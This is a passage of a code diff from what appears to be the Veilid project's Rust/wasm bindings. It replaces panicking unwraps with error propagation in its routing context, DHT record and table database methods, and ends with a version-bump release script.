&self,
safety_selection: SafetySelection,
) -> APIResult<VeilidRoutingContext> {
let routing_context = self.getRoutingContext()?;
APIResult::Ok(VeilidRoutingContext {
inner_routing_context: routing_context.with_custom_privacy(safety_selection)?,
})
}

/// Use a specified `Sequencing` preference.
/// Returns a new instance of VeilidRoutingContext - does not mutate.
pub fn withSequencing(&self, sequencing: Sequencing) -> APIResult<VeilidRoutingContext> {
let routing_context = self.getRoutingContext()?;
APIResult::Ok(VeilidRoutingContext {
inner_routing_context: routing_context.with_sequencing(sequencing),
})
}
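Since `inner_routing_context` is no longer an `Option`, the old `createWith___()` factories collapse into a fallible `new()`/`create()` plus `withPrivacy()`, `withCustomPrivacy()` and `withSequencing()` methods that each return a fresh instance rather than mutating. A rough sketch of the resulting call pattern; the `Sequencing::EnsureOrdered` variant is taken from veilid-core and is an assumption, not part of this diff:

```rust
// Sketch: build a context with default privacy and ordered delivery.
fn make_private_ordered_context() -> APIResult<VeilidRoutingContext> {
    let ctx = VeilidRoutingContext::new()?           // or VeilidRoutingContext::create()
        .withPrivacy()?                              // returns a new instance
        .withSequencing(Sequencing::EnsureOrdered)?; // returns a new instance
    APIResult::Ok(ctx)
}
```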
/// App-level unidirectional message that does not expect any value to be returned.

@ -154,7 +150,7 @@ impl VeilidRoutingContext {
#[wasm_bindgen(skip_jsdoc)]
pub async fn appMessage(&self, target_string: String, message: String) -> APIResult<()> {
let routing_context = self.getRoutingContext()?;
let message = unmarshall(message);
let message = unmarshall(message)?;

let veilid_api = get_veilid_api()?;
let target = veilid_api.parse_as_target(target_string).await?;

@ -171,7 +167,7 @@ impl VeilidRoutingContext {
/// @returns an answer blob of up to `32768` bytes, base64Url encoded.
#[wasm_bindgen(skip_jsdoc)]
pub async fn appCall(&self, target_string: String, request: String) -> APIResult<String> {
let request: Vec<u8> = unmarshall(request);
let request: Vec<u8> = unmarshall(request)?;
let routing_context = self.getRoutingContext()?;

let veilid_api = get_veilid_api()?;
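`appMessage` and `appCall` both resolve their target from a string via `parse_as_target` and take the payload base64url-encoded; with `unmarshall(...)?` a bad payload now returns an error rather than panicking. A hedged round-trip sketch (the payload contents and the `marshall` helper are assumptions carried over from the earlier sketch):

```rust
// Sketch: send a request blob and return the base64url-encoded answer.
async fn ping_target(ctx: &VeilidRoutingContext, target: String) -> APIResult<String> {
    let request = marshall(b"ping"); // payload crosses the JS boundary as base64url
    let answer_b64 = ctx.appCall(target, request).await?;
    APIResult::Ok(answer_b64)
}
```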
@ -217,11 +213,10 @@ impl VeilidRoutingContext {
key: String,
writer: Option<String>,
) -> APIResult<DHTRecordDescriptor> {
let key = TypedKey::from_str(&key).unwrap();
let writer = match writer {
Some(writer) => Some(KeyPair::from_str(&writer).unwrap()),
_ => None,
};
let key = TypedKey::from_str(&key)?;
let writer = writer
.map(|writer| KeyPair::from_str(&writer))
.map_or(APIResult::Ok(None), |r| r.map(Some))?;

let routing_context = self.getRoutingContext()?;
let dht_record_descriptor = routing_context.open_dht_record(key, writer).await?;

@ -232,7 +227,7 @@ impl VeilidRoutingContext {
///
/// Closing a record allows you to re-open it with a different routing context
pub async fn closeDhtRecord(&self, key: String) -> APIResult<()> {
let key = TypedKey::from_str(&key).unwrap();
let key = TypedKey::from_str(&key)?;
let routing_context = self.getRoutingContext()?;
routing_context.close_dht_record(key).await?;
APIRESULT_UNDEFINED

@ -244,7 +239,7 @@ impl VeilidRoutingContext {
/// Deleting a record does not delete it from the network, but will remove the storage of the record locally,
/// and will prevent its value from being refreshed on the network by this node.
pub async fn deleteDhtRecord(&self, key: String) -> APIResult<()> {
let key = TypedKey::from_str(&key).unwrap();
let key = TypedKey::from_str(&key)?;
let routing_context = self.getRoutingContext()?;
routing_context.delete_dht_record(key).await?;
APIRESULT_UNDEFINED

@ -262,7 +257,7 @@ impl VeilidRoutingContext {
subKey: u32,
forceRefresh: bool,
) -> APIResult<Option<ValueData>> {
let key = TypedKey::from_str(&key).unwrap();
let key = TypedKey::from_str(&key)?;
let routing_context = self.getRoutingContext()?;
let res = routing_context
.get_dht_value(key, subKey, forceRefresh)

@ -280,10 +275,8 @@ impl VeilidRoutingContext {
subKey: u32,
data: String,
) -> APIResult<Option<ValueData>> {
let key = TypedKey::from_str(&key).unwrap();
let data: Vec<u8> = data_encoding::BASE64URL_NOPAD
.decode(&data.as_bytes())
.unwrap();
let key = TypedKey::from_str(&key)?;
let data = unmarshall(data)?;

let routing_context = self.getRoutingContext()?;
let res = routing_context.set_dht_value(key, subKey, data).await?;
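The DHT record methods follow the same pattern: keys are `TypedKey` strings, an optional writer is a `KeyPair` string, payloads are base64url, and every parse now fails with `?` instead of `.unwrap()`. A hedged end-to-end sketch; the `openDhtRecord`/`getDhtValue`/`setDhtValue` names are inferred from the visible bodies and the camelCase convention used elsewhere, and the key format shown is illustrative:

```rust
// Sketch: open a record, write subkey 0, read it back, then close it.
async fn update_record(
    ctx: &VeilidRoutingContext,
    key: String,            // TypedKey string, e.g. "VLD0:..." (format assumed)
    writer: Option<String>, // optional KeyPair string granting write access
) -> APIResult<Option<ValueData>> {
    let _descriptor = ctx.openDhtRecord(key.clone(), writer).await?;
    ctx.setDhtValue(key.clone(), 0, marshall(b"hello")).await?;
    let value = ctx.getDhtValue(key.clone(), 0, true).await?; // force a network refresh
    ctx.closeDhtRecord(key).await?;
    APIResult::Ok(value)
}
```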
@ -63,11 +63,11 @@ impl VeilidTableDB {
/// Read a key from a column in the TableDB immediately.
pub async fn load(&mut self, columnId: u32, key: String) -> APIResult<Option<String>> {
self.ensureOpen().await;
let key = unmarshall(key);
let key = unmarshall(key)?;
let table_db = self.getTableDB()?;

let out = table_db.load(columnId, &key).await?.unwrap();
let out = Some(marshall(&out));
let out = table_db.load(columnId, &key).await?;
let out = out.map(|out| marshall(&out));
APIResult::Ok(out)
}

@ -75,8 +75,8 @@ impl VeilidTableDB {
/// Performs a single transaction immediately.
pub async fn store(&mut self, columnId: u32, key: String, value: String) -> APIResult<()> {
self.ensureOpen().await;
let key = unmarshall(key);
let value = unmarshall(value);
let key = unmarshall(key)?;
let value = unmarshall(value)?;
let table_db = self.getTableDB()?;

table_db.store(columnId, &key, &value).await?;

@ -86,11 +86,11 @@ impl VeilidTableDB {
/// Delete key with from a column in the TableDB.
pub async fn delete(&mut self, columnId: u32, key: String) -> APIResult<Option<String>> {
self.ensureOpen().await;
let key = unmarshall(key);
let key = unmarshall(key)?;
let table_db = self.getTableDB()?;

let out = table_db.delete(columnId, &key).await?.unwrap();
let out = Some(marshall(&out));
let out = table_db.delete(columnId, &key).await?;
let out = out.map(|out| marshall(&out));
APIResult::Ok(out)
}

@ -161,15 +161,15 @@ impl VeilidTableDBTransaction {
/// Store a key with a value in a column in the TableDB.
/// Does not modify TableDB until `.commit()` is called.
pub fn store(&self, col: u32, key: String, value: String) -> APIResult<()> {
let key = unmarshall(key);
let value = unmarshall(value);
let key = unmarshall(key)?;
let value = unmarshall(value)?;
let transaction = self.getTransaction()?;
transaction.store(col, &key, &value)
}

/// Delete key with from a column in the TableDB
pub fn deleteKey(&self, col: u32, key: String) -> APIResult<()> {
let key = unmarshall(key);
let key = unmarshall(key)?;
let transaction = self.getTransaction()?;
transaction.delete(col, &key)
}
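`load` and `delete` now report a missing key as `None` instead of unwrapping into a panic, and only `marshall` the value when one is present. A hedged sketch of the resulting calling pattern (the column index and key contents are illustrative):

```rust
// Sketch: store a value, then load it back, treating a missing key as None.
async fn roundtrip(db: &mut VeilidTableDB) -> APIResult<()> {
    let key = marshall(b"counter");
    db.store(0, key.clone(), marshall(b"1")).await?;
    match db.load(0, key).await? {
        Some(_value_b64) => { /* value came back base64url-encoded */ }
        None => { /* key not present in column 0 */ }
    }
    APIResult::Ok(())
}
```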
@ -36,3 +36,13 @@ pub(crate) fn into_unchecked_string_array(items: Vec<String>) -> StringArray {
.collect::<js_sys::Array>()
.unchecked_into::<StringArray>() // TODO: can I do this a better way?
}

/// Convert a StringArray (`js_sys::Array` with the type of `string[]`) into `Vec<String>`
pub(crate) fn into_unchecked_string_vec(items: StringArray) -> Vec<String> {
items
.unchecked_into::<js_sys::Array>()
.to_vec()
.into_iter()
.map(|i| serde_wasm_bindgen::from_value(i).unwrap())
.collect::<Vec<String>>()
}
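The new `into_unchecked_string_vec` is simply the inverse of the existing `into_unchecked_string_array`. A hedged round-trip sketch, meaningful only on a wasm32 target with a JS runtime (for example under wasm-bindgen-test):

```rust
// Sketch: Vec<String> -> StringArray -> Vec<String> should be lossless.
fn check_string_array_round_trip() {
    let names = vec!["foo".to_string(), "bar".to_string()];
    let arr: StringArray = into_unchecked_string_array(names.clone());
    assert_eq!(into_unchecked_string_vec(arr), names);
}
```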
@ -1,4 +1,6 @@
#!/bin/bash

# Fail out if any step has an error
set -e

if [ "$1" == "patch" ]; then

@ -15,5 +17,15 @@ else
exit 1
fi

# Change version of crates and packages everywhere
bumpversion $PART

# Get the new version we bumped to
NEW_VERSION=$(cat .bumpversion.cfg | grep current_version\ = | cut -d\ -f3)
echo NEW_VERSION=$NEW_VERSION

# Update crate dependencies for the crates we publish
cargo upgrade -p veilid-tools@$NEW_VERSION -p veilid-core@$NEW_VERSION

# Update lockfile
cargo update